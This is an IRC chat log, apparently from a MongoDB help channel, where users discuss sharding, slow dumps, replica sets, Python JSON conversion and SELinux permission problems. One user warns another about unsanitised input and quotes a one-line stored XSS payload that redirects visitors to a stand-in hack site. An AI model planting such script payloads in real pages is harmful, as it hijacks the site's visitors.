[03:32:53] <arthurnn> i `ve got some questions about ShardKeys and queries in Shard nodes
[03:33:59] <arthurnn> i work at 500px . and we start using mongodb a few months ago to store all activities from the site. now we are wondering to start sharding this mongo intance that we have
[03:34:08] <arthurnn> but i need to know if this is the better option
[04:17:41] <jwilliams> what is the right way to do continue on error if dirver is prior to e.g. 2.8.0?
[10:27:06] <NodeX> sanitising... it's very dangerous to let unsanitised code into any database
[10:27:33] <circlicious> what kind of sanitizing ? i thought theres no sql injection thingie in mongo, so just storing whatever the user sent was fine in my case.
[10:28:25] <circlicious> basically, i am just allowing any user data for the "preferences" part of each record/document
[10:28:59] <circlicious> oh yeh, i didnt think of XSS, lol
[10:29:00] <NodeX> store <script>document.location.href='http://my.hacksite.com/exploitme.php'</script>
[10:29:20] <Guest45545> Hi guys. I have a quick question, I'm a newbie to mongo. When I use mongorestore on a set of bson files created by mongobackup where is the database restored to?
[10:29:21] <NodeX> when your user re-echo's what you saved they leave your site
[10:29:43] <NodeX> it's restored to the database it was dumped from
[10:40:27] <circlicious> ok done, things are better now NodeX
[10:43:15] <neil__g> Some advice, if anyone has a moment: I have a P-S-S replicaset, and due to a run-away import all machines are now sitting at about 90% disk space. I've since deleted the big collection, but Mongo hasn't released the disk space. What's the safest way to free up that disk space? This is in production.
[10:43:54] <Guest45545> NodeX: can you just clarify this for me. If I run mongobackup on my database, can I use mongorestore on the bson files on another server to recreate the database?
[10:55:42] <ankakusu> I have a problem while inserting date time object into mongodb.
[10:58:35] <ankakusu> as it is observed, I entered "2011-10-02T23:49:19Z"
[10:58:50] <circlicious> NodeX: say if you had a field called foo in your documents, that would sometime shave a value and sometimes would not have a value, what would you do when it would not have a value ?
[10:59:03] <circlicious> store foo: '' or do checking in PHP and not store anything for it ?
[10:59:22] <ankakusu> but I get "2011-10-02T20:49:19Z"
[10:59:38] <ankakusu> what is wrong about the code snippet?
[11:04:51] <NodeX> circlicious : it depends how your app want's to deal with it
[11:05:19] <circlicious> i guess if i add foo: '' that would end up consuming lots of megabytes with millions of documents
[11:05:28] <circlicious> so i'll better do checking in php and not save it, should be fast
[11:15:06] <pb8345> hi, does anyone have experience with oracle nosql?
[12:18:09] <jwilliams> stoping one process looks making more progress.
[13:43:58] <addisonj> http://aws.typepad.com/aws/2012/08/fast-forward-provisioned-iops-ebs.html this is quite exciting, predictable performance from EBS? who woulda thought
[14:47:07] <NodeX> anyone know much about PCI complience with MongoDB ?
[15:20:58] <BurtyB> Anyone know how I can prevent "PHP Fatal error: Uncaught exception 'MongoCursorException' with message 'too many attempts to update config, failing' in " I'm assuming it's because it's moving shards around?
[15:50:35] <cwebb_> i am running mongodump and its speed is very slow (4 hours for only 5% with total docs around 120mm). the previous run for another collection didn't take that long.
[15:51:29] <cwebb_> checking mongostat --discover, not many locked % (usually 0%, several times it may be around 10%).
[15:51:49] <cwebb_> iostat -x 1 shows that cpu is usually idle.
[15:52:05] <cwebb_> what other factors or where i may be able to start to check?
[16:05:49] <kali> cwebb_: look for faults in mongostat rather than locks. locks are taken only on writes
[16:09:11] <cwebb_> kali: i just notice there is a higher value (around 50~60) in faults column. i guess that's because there is no index created (it was just for testing bulk write. so index will be created later)
[16:10:03] <nemothekid> Anyone here familiar with the mongodb perl driver? It doesn't seem to encode utf-8 strings properly
[16:10:04] <cwebb_> but the another collection whose index was also not created did not take very long to dump around 60g data to disk.
[16:10:41] <cwebb_> anyway i can reduce the page fault? or to improve this slowness issue?
[16:14:08] <cwebb_> kali: i wish i could have more ram : (
[16:14:27] <kali> is it 50/60 when mongodump is running ?
[16:15:06] <cwebb_> yes. turn of mongodump, the faults drops to 1 ~ 2.
[16:16:11] <scttnlsn> how can i atomically insert a document only if a collection is empty? is this possible with findAndModify?
[16:17:03] <addisonj> cwebb_: we had a weird issue like that, I think we ended up doing a compact and repair then all was okay
[16:18:06] <addisonj> scttnlsn: pretty sure thats a no, but I could be wrong...
[16:19:42] <cwebb_> when running compact, will it have influence e.g. performance if no indexes exist?
[16:19:46] <scttnlsn> addisonj: ok, that's what i though. i've tried all sorts of various things with findAndModify, none of which worked like i wanted
[16:21:03] <lbjay> i'm trying to setup an init.d script for mongo on a centos system that runs using the numactl command. anyone have any examples of this on centos?
[16:21:59] <lbjay> centos doesn't have a start-stop-daemon command, just a shell function called "daemon", so the examples i'm seeing don't work for me
[18:28:54] <SisterArrow> I have a 3 part replica set, and the primay went down, so a secondary took over and data was written to it as it was primary at this point. When i restarted the previous primary(which should be primary aswell) it stays as primary and in the mongo log it says
[18:30:54] <Almindor> we had a repl error (disk overuse) and we want to move a replicaset to another drive (on linux). I have started re-syncing the slave, but it's not even half-done and we can already put the new drives into the machine. Is it possible to copy the data of the slave so it continues syncing from where it stopped?
[18:31:20] <Almindor> note that I will mount the new drive in a way which is transparent for mongo
[18:31:34] <kali> Almindor: i tthink it will start all over again
[18:32:20] <Almindor> kali: so if you start a full re-sync, stop mongod for it and restart it deletes all data and resyncs again?
[18:34:00] <kali> i thikn this is what it will do, yeah
[19:08:21] <boll> it's not like I am clobbering the server though
[19:14:16] <TheSteve0> alright I am working in Python and I want to convert my results from BISON to just JSON - I have spent a couple hours searching around and trying different solutions and I can't get it to work
[19:28:39] <TkTech> find() just returns an iterable cursor that you must traverse, .find_one() returns a dict. json.dumps() takes a dict.
[19:29:44] <TheSteve0> TkTech: yup beginner to Python
[19:30:11] <TheSteve0> aahhh I was feeding JSON dump the list
[19:30:13] <dstorrs> I've got a harvester which pulls data from YouTube and inserts it to Mongo. When it first starts, I get excellent insert rates -- 1000+ w/s. Within a few minutes, it drops to ~700 w/s. Then 300. Then 100. Then a few dozen.
[19:30:38] <dstorrs> I've been through my code and I don't see anything to cause this...is there anything on the Mongo side that is a likely culprit?
[19:30:56] <dstorrs> It's 9 machines, each with multiple copies of the harvester proc running in parallel.
[19:31:47] <dstorrs> any ideas at all are much appreciated, because I'm kinda at wits end.
[19:32:59] <dstorrs> oh, and it's a sharded DB if that matters
[19:33:15] <TheSteve0> TkTech: well that is inconvenient - I was hoping I could just "automagically" give the list to a converter and get back nice clean JSON
[19:33:41] <TkTech> I'm confused as to why this is confusing.
[19:33:51] <TkTech> And why you keep describing it as "nice clean JSON"
[19:34:10] <dstorrs> TheSteve0: I didn't see the beginning of your convo, but you can probably do this: db.coll.find(..).forEach(function(d){ printjson(d) })
[19:38:06] <TheSteve0> TkTech: I understand it is not techincally
[19:38:12] <TkTech> No, not technically nor really.
[19:38:35] <TkTech> If you want JSON, import json and turn it into JSON.
[19:39:27] <TheSteve0> TkTech: if I got rid of the u before each string, the string I return is from str(list(find)) is a JSON string - especially since I have no dates in my docuemts
[19:40:18] <TkTech> A poor orphanage burns down every single time you say that.
[19:40:26] <TkTech> Why are you against doing this properly in two lines?
[19:40:47] <TkTech> Do not treat a python dict, which is a python dict, as g'damn JSON.
[19:40:52] <TheSteve0> TkTech: I am not - which is why I said let me go do what you said
[19:41:15] <TheSteve0> TkTech: I was laughing at your Orphange statement
[19:55:43] <nemothekid> So we have about 13 million records in a shared collection to be updated daily in about 4 hours. We've found that the fastest way to do this is to just create a temporary table, do the inserts, then rename & drop. Sadly, you can't rename a shared collection. Obviously our next step was to removes and inserts or just updates. This is _much_ slower. Are there any other options?
[20:09:33] <TheSteve0> TkTech: Booya cashah - it works
[20:09:38] <TheSteve0> TkTech: thanks for your patience
[20:10:05] <TheSteve0> TkTech: any ideas on where I would put this so some other poor newb like me can find it all collected in one place
[20:10:14] <TheSteve0> TkTech: I mean in terms of doc
[20:10:36] <boll> On a not very heavily loaded sharded database, any obvious reasons that a backlog of 2000 or more write operations sit in the operations queue (db.currentOP())
[20:14:23] <EricL> Does adding a replicaset to a sharded environment (ie the shard) distribute reads?
[20:22:08] <jgornick> Hey guys, does anyone have any insight into how I can write a map/reduce to produce a list of documents that are in a hierarchal tree structure using the child links method? I need to produce a list where I know the ID of a single document and I need to capture all of it's children as well.
[20:26:48] <boll> In a replica set, is there a downside to allowing slave reads?
[20:26:51] <crudson> jgornick: Sounds perfectly reasonable. Do you have example input documents?
[20:27:24] <nofxx> boll, data may took some time to replicate, but it's meant to be used like that
[20:27:59] <nofxx> if you don't read from the slaves you got yourself some expensive backup machine
[20:28:21] <jgornick> crudson: I suppose you could look at the sample for child links @ http://www.mongodb.org/display/DOCS/Trees+in+MongoDB#TreesinMongoDB-ChildLinks
[20:28:58] <nofxx> boll, you can use consistency: :strong in a per connection basis, check your driver
[20:29:04] <jgornick> crudson: Actually, I should get something more concrete to my example.
[20:29:08] <boll> nofxx: I don't read from the secondary, but it's incredibly handy for robustnes and upgrades
[21:07:44] <acidchild> Hello, i added a shard that contains the entire database but i added it as localhost not the IP. how do i change the shard hostname/ip without draining it? because it contains all the data and it's failing to move chunks to the other shard because it's 'localhost' not the IP?
[21:08:00] <acidchild> these are the errors i am getting; http://pastebin.slackadelic.com/p/Ze7Ox045.html
[21:11:40] <emperorcezar> So I'm using mongodb as a mq backend for celery. The program using celery is migrating email. So it's pushing messages into a queue being stored on mongo and them pulling them off and being pushed somewhere else. From my understanding, mongo will just keep growing the db file until I do a repair? My mail size is 2.5 Terrabytes. So I'm concerned about the db becoming huge without repair.
[21:17:17] <emperorcezar> This thing better scale off the bat. There's no light usage. Soon as I turn it on, it's going to hammer.
[21:45:53] <nofxxx> Just to make sure I got it right, repairDB(), on new versions will only release free space to the system, so it's not needed to run that in a timely fashion anymore
[22:13:19] <kingsol> hey all… new to mongodb (literally today) - I've followed the guide in the docs, and have searched the google to find my issue to no avail. It is permission related for sure. I am on fedora. I can run "mongod" as root and it fires up. If i run "service mongod start" I get a fail, says it can't write to the log. I've found posts with similar problem… I've checked the permissions for /var/log, /var/log/monogo/ and the file itself, I've done this f
[22:13:19] <kingsol> /data/db/ as well… at a dead end as I am not a permissions wizard.
[22:18:35] <kingsol> already working … starting now...
[22:20:01] <kingsol> jY: so does that mean I need to permanently disable selinux? to be honest, I am not intimate with benefit/issues with selinux other then some high level details
[22:20:36] <jY> or figure out how to tell selinux writing to those logs and binding to that port is ok for the mongo user
[22:21:47] <kingsol> is selinux a "strong benefit" or a "nice-to-have" or is it relative to function/role of the machine
[22:22:34] <jY> depends on your stance on security i guess
[22:22:55] <jY> it makes things like buffer overflows pretty much impossible
[22:23:41] <kingsol> ok… thank you so much… I'll see if I can figure out how to tell selinux to allow mongos user for those files/folders
[22:24:07] <arthurnn> anyone in there. willing to help me out.
[22:25:07] <arthurnn> i had a collection .. in one mongod server only.. i added that in a shard cluster .. and I set the shard key to a property that is not unique.
[22:29:55] <arthurnn> because i started sharding a pre existent collection that i had.
[22:30:12] <arthurnn> and it looks like that .count() is getting smaller and smaller. any reason for it?
[22:32:22] <kingsol> jY: ok, checked the logs… looks like another perm issue I can track down on google "Unable to acquire lock for lockfilepath: /var/lib/mongo/mongod.lock" checking google
[22:36:45] <arthurnn> if I do a stats() in my collection. it looks like that the count the shard0000 is decreasing but the count in shard0001 is not incresing
[22:57:45] <kingsol> jY: still won't start, fixed the locking issue by simply removing the file and letting it be created again… now it is failing because it says the port is in use
[23:01:54] <kingsol> jY: interesting… so it is actually starting just fine now, the service start is hanging it seems as though its not getting a successful message from mongod starting… if i tail -f the log, and start with a service mongod start &, then run mongo, I can connect. If i let it sit long enough the process for the service start terminates with a fail
[23:23:04] <kingsol> jY: I gotta run… I appreciate your help!